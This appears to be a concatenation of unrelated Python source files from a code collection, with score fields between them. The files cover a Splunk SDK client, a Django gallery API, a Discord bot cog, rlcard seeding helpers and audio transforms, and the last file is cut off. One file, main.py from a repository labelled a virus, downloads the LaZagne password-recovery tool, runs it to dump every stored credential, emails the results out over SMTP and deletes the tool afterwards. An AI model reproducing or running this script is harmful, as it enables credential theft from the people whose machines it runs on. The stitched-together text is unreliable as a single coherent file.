# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Action Service
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
OpenAPI spec version: v1beta2.12 (recommended default)
Generated by: https://openapi-generator.tech
"""
from requests import Response
from string import Template
from typing import List, Dict
from splunk_sdk.base_client import handle_response
from splunk_sdk.base_service import BaseService
from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel
from splunk_sdk.action.v1beta2.gen_models import Action
from splunk_sdk.action.v1beta2.gen_models import ActionMutable
from splunk_sdk.action.v1beta2.gen_models import ActionResult
from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail
from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey
from splunk_sdk.action.v1beta2.gen_models import ServiceError
from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
class ActionService(BaseService):
"""
Action Service
Version: v1beta2.12
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
"""
def __init__(self, base_client):
super().__init__(base_client)
def create_action(self, action: Action, query_params: Dict[str, object] = None) -> Action:
"""
Creates an action template.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/action/v1beta2/actions").substitute(path_params)
url = self.base_client.build_url(path)
data = action.to_dict()
response = self.base_client.post(url, json=data, params=query_params)
return handle_response(response, Action)
def delete_action(self, action_name: str, query_params: Dict[str, object] = None) -> SSCVoidModel:
"""
Removes an action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.delete(url, params=query_params)
return handle_response(response, )
def get_action(self, action_name: str, query_params: Dict[str, object] = None) -> Action:
"""
Returns a specific action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, Action)
def get_action_status(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> ActionResult:
"""
Returns the status of an action that was invoked. The status is available for 4 days after the last status change.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
"status_id": status_id,
}
path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, ActionResult)
def get_action_status_details(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> List[ActionResultEmailDetail]:
"""
Returns the status details of the invoked email action. The status is available for 4 days after the last status change.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
"status_id": status_id,
}
path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}/details").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, ActionResultEmailDetail)
def get_public_webhook_keys(self, query_params: Dict[str, object] = None) -> List[PublicWebhookKey]:
"""
Returns an array of one or two webhook keys. The first key is active. The second key, if present, is expired.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/system/action/v1beta2/webhook/keys").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, PublicWebhookKey)
def list_actions(self, query_params: Dict[str, object] = None) -> List[Action]:
"""
Returns the list of action templates.
"""
if query_params is None:
query_params = {}
path_params = {
}
path = Template("/action/v1beta2/actions").substitute(path_params)
url = self.base_client.build_url(path)
response = self.base_client.get(url, params=query_params)
return handle_response(response, Action)
def trigger_action(self, action_name: str, trigger_event: TriggerEvent, query_params: Dict[str, object] = None) -> SSCVoidModel:
"""
Invokes an action.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
data = trigger_event.to_dict()
response = self.base_client.post(url, json=data, params=query_params)
return handle_response(response, )
def update_action(self, action_name: str, action_mutable: ActionMutable, query_params: Dict[str, object] = None) -> Action:
"""
Modifies an action template.
"""
if query_params is None:
query_params = {}
path_params = {
"action_name": action_name,
}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
url = self.base_client.build_url(path)
data = action_mutable.to_dict()
response = self.base_client.patch(url, json=data, params=query_params)
return handle_response(response, Action)
| 1.75 | 2 |
src/brewlog/home/__init__.py | zgoda/brewlog | 3 | 4949 | <filename>src/brewlog/home/__init__.py
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
| 1.429688 | 1 |
main.py | TheRavehorn/DownloadExecuteReport-Virus | 0 | 4950 | #!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("<EMAIL>", "yourpassword", result)
os.remove("lazagne.exe")
| 2.84375 | 3 |
SmartAPI/rdf/LinkedList.py | Kreastr/SmartAPI-HEILA | 0 | 4951 | from SmartAPI.rdf.List import List
class LinkedList(List):
def __init__(self):
List.__init__(self)
| 1.945313 | 2 |
frog/views/gallery.py | dreamhaven/Frog | 3 | 4952 | ##################################################################################################
# Copyright (c) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def get(request, obj_id=None):
if obj_id:
obj = Gallery.objects.get(pk=obj_id)
if obj.security != Gallery.PUBLIC and request.user.is_anonymous:
raise PermissionDenied
else:
res = Result()
personal = []
clearance = Gallery.PUBLIC
if request.user.is_authenticated:
personal = Gallery.objects.filter(
security=Gallery.PERSONAL, owner=request.user
)
try:
clearance = request.user.frog_prefs.first().clearance
except AttributeError:
clearance = Gallery.PUBLIC
# Staff members should see everything
if request.user.is_staff:
clearance = Gallery.GUARDED
objects = Gallery.objects.filter(security__lte=clearance)
ids = []
for gallery in objects:
if gallery.security == Gallery.PERSONAL:
continue
if gallery.id in ids:
continue
ids.append(gallery.id)
res.append(gallery.json())
for gallery in personal:
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def post(request):
""" Create a Gallery """
defaultname = "New Gallery %i" % Gallery.objects.all().count()
data = json.loads(request.body)["body"]
title = data.get("title", defaultname)
description = data.get("description", "")
security = int(
data.get("security", request.user.frog_prefs.first().clearance)
)
g, created = Gallery.objects.get_or_create(title=title)
g.security = security
g.description = description
g.owner = request.user
g.save()
res = Result()
res.append(g.json())
res.message = "Gallery created" if created else ""
return JsonResponse(res.asDict())
@login_required
def put(request, obj_id=None):
""" Adds Image and Video objects to Gallery based on GUIDs """
data = json.loads(request.body)["body"]
guids = data.get("guids", "").split(",")
move = data.get("from")
security = data.get("security")
gallery = Gallery.objects.get(pk=obj_id)
# Set the security first so subsequent securityChecks will get the correct security level
if security is not None:
gallery.security = json.loads(security)
gallery.save()
for child in gallery.gallery_set.all():
child.security = gallery.security
child.save()
if guids:
items = getObjectsFromGuids(guids)
gallery.addItems(items)
if move:
fromgallery = Gallery.objects.get(pk=move)
fromgallery.removeItems(items)
res = Result()
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def delete(request, obj_id=None):
""" Removes ImageVideo objects from Gallery """
data = json.loads(request.body)
guids = data.get("guids").split(",")
items = getObjectsFromGuids(guids)
gallery = Gallery.objects.get(pk=obj_id)
LOGGER.info(
"{} removed {} from {}".format(request.user.email, guids, gallery)
)
gallery.removeItems(items)
res = Result()
return JsonResponse(res.asDict())
@login_required
def filterObjects(request, obj_id):
"""
Filters Gallery for the requested ImageVideo objects. Returns a Result object with
serialized objects
"""
if int(obj_id) == 0:
obj = None
else:
obj = Gallery.objects.get(pk=obj_id)
isanonymous = request.user.is_anonymous
if isanonymous and obj is None:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if isanonymous and obj and obj.security != Gallery.PUBLIC:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if obj and obj.security != Gallery.PERSONAL:
if request.user.frog_prefs.first().clearance < obj.security:
raise PermissionDenied()
tags = json.loads(request.GET.get("filters", "[[]]"))
more = json.loads(request.GET.get("more", "false"))
orderby = request.GET.get(
"orderby", request.user.frog_prefs.get().json()["orderby"]
)
tags = [t for t in tags if t]
return _filter(request, obj, tags=tags, more=more, orderby=orderby)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
:param more -- bool, Returns more of the same filtered set of images based on session range
return list, Objects filtered
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
@require_POST
@login_required
def subscribe(request, obj_id):
gallery = Gallery.objects.get(pk=obj_id)
data = json.loads(request.body)["body"]
frequency = data.get("frequency", GallerySubscription.WEEKLY)
sub, created = GallerySubscription.objects.get_or_create(
gallery=gallery, user=request.user, frequency=frequency
)
if not created:
# it already existed so delete it
sub.delete()
return JsonResponse(Result().asDict())
| 0.992188 | 1 |
pirates/speedchat/PSpeedChatQuestMenu.py | itsyaboyrocket/pirates | 3 | 4953 | <reponame>itsyaboyrocket/pirates
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.speedchat.PSpeedChatQuestMenu
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCTerminal import *
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from pirates.quest.Quest import Quest
from pirates.speedchat.PSpeedChatQuestTerminal import *
from pirates.pirate.LocalPirate import *
from pirates.quest.QuestStatus import *
from pirates.quest.QuestDNA import *
class PSpeedChatQuestMenu(SCMenu):
__module__ = __name__
def __init__(self):
SCMenu.__init__(self)
self.accept('localAvatarQuestAdded', self.__questMenuRefresh)
self.accept('localAvatarQuestUpdate', self.__questMenuRefresh)
self.accept('localAvatarQuestItemUpdate', self.__questMenuRefresh)
self.accept('localAvatarQuestComplete', self.__questMenuRefresh)
self.accept('localAvatarQuestDeleted', self.__questMenuRefresh)
def destroy(self):
SCMenu.destroy(self)
def __questMenuRefresh(self, quest, item=None, note=None):
self.clearMenu()
quests = localAvatar.questStatus.getCurrentQuests()
if quests is None:
return
for quest in quests:
q = quest
if q is None:
continue
if not q.isComplete():
self.__questAddSCChat(q)
return
def __questAddSCChat(self, quest):
qId = quest.questId
qDNA = QuestDB.QuestDict.get(qId)
if not qDNA:
return
qInt = qDNA.questInt
i = 0
for task in quest.questDNA.getTasks():
if len(quest.getSCSummaryText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCSummaryText(i), qInt, quest.giverId, 0, i))
if len(quest.getSCWhereIsText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCWhereIsText(i), qInt, quest.giverId, 1, i))
if len(quest.getSCHowToText(0)) > 2:
self.append(PSpeedChatQuestTerminal(quest.getSCHowToText(i), qInt, quest.giverId, 2, i))
i = i + 1 | 2.1875 | 2 |
spotifyembed/spotifyembed.py | R3XET/coffee-cogs | 0 | 4954 | # from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
class Spotifyembed(commands.Cog):
"""Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account."""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, identifier=806715409318936616)
default_guild = {
"spotifyembedEnabled": False,
}
self.config.register_guild(**default_guild)
@commands.group(aliases=["setspembed", "setspe"])
@checks.guildowner_or_permissions()
async def setspotifyembed(self, ctx: commands.Context):
"""Set Spotify Embed settings"""
if not ctx.invoked_subcommand:
# Guild settings
e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="")
e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False)
await ctx.send(embed=e)
@setspotifyembed.command(name="enable")
async def setspembedenable(self, ctx):
"""Enable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(True)
await ctx.message.add_reaction("✅")
@setspotifyembed.command(name="disable")
async def setspembeddisable(self, ctx):
"""Disable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(False)
await ctx.message.add_reaction("✅")
@commands.command(aliases=["spembed", "spe"])
async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False):
"""Return a Spotify embed link
Can set asMyself to true/false, for sending as webhook"""
spembedSplit = spotifyLink.split('.com/')
sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1]
if asMyself == False:
return await ctx.send(sendMsg)
elif asMyself == True:
# Find a webhook that the bot made
try:
whooklist = await ctx.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await ctx.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=ctx.author.display_name,
avatar_url=ctx.author.avatar_url,
)
except discord.errors.Forbidden:
return await ctx.send(sendMsg)
else:
return await ctx.send("An error occurred.")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if message.webhook_id:
return
if message.guild is None:
return
spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled()
if spotifyembedEnabled is not True:
return
# Ignore if we find [p]spotifyembed in the trigger message
spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)"
spembedCommands = re.findall(spembedCommandIgnore, message.clean_content)
if len(spembedCommands) > 0:
return
# Ignore if we find no spotify links in the trigger message
spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)"
spembedMatches = re.findall(spembedFinder, message.clean_content)
if len(spembedMatches) <= 0:
return
sendMsg = ""
for match in spembedMatches:
spembedSplit = match.split('.com/')
sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n"
# Find a webhook that the bot made
try:
whooklist = await message.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await message.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=message.author.display_name,
avatar_url=message.author.avatar_url,
)
except discord.errors.Forbidden:
return await message.channel.send(sendMsg)
| 2.59375 | 3 |
rlcard/utils/seeding.py | AdrianP-/rlcard | 0 | 4955 | <reponame>AdrianP-/rlcard
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
def colorize(string, color, bold=False, highlight = False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def error(msg, *args):
print(colorize('%s: %s'%('ERROR', msg % args), 'red'))
def np_random(seed=None):
if seed is not None and not (isinstance(seed, int) and 0 <= seed):
raise error.Error('Seed must be a non-negative integer or omitted, not {}'.format(seed))
seed = create_seed(seed)
rng = np.random.RandomState()
rng.seed(_int_list_from_bigint(hash_seed(seed)))
return rng, seed
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
linear correlations between seeds of multiple PRNG's can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
def _bigint_from_bytes(bytes):
sizeof_int = 4
padding = sizeof_int - len(bytes) % sizeof_int
bytes += b'\0' * padding
int_count = int(len(bytes) / sizeof_int)
unpacked = struct.unpack("{}I".format(int_count), bytes)
accum = 0
for i, val in enumerate(unpacked):
accum += 2 ** (sizeof_int * 8 * i) * val
return accum
def _int_list_from_bigint(bigint):
# Special case 0
if bigint < 0:
raise error.Error('Seed must be non-negative, not {}'.format(bigint))
elif bigint == 0:
return [0]
ints = []
while bigint > 0:
bigint, mod = divmod(bigint, 2 ** 32)
ints.append(mod)
return ints
| 2.28125 | 2 |
ops/transforms.py | ex4sperans/freesound-classification | 55 | 4956 | import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
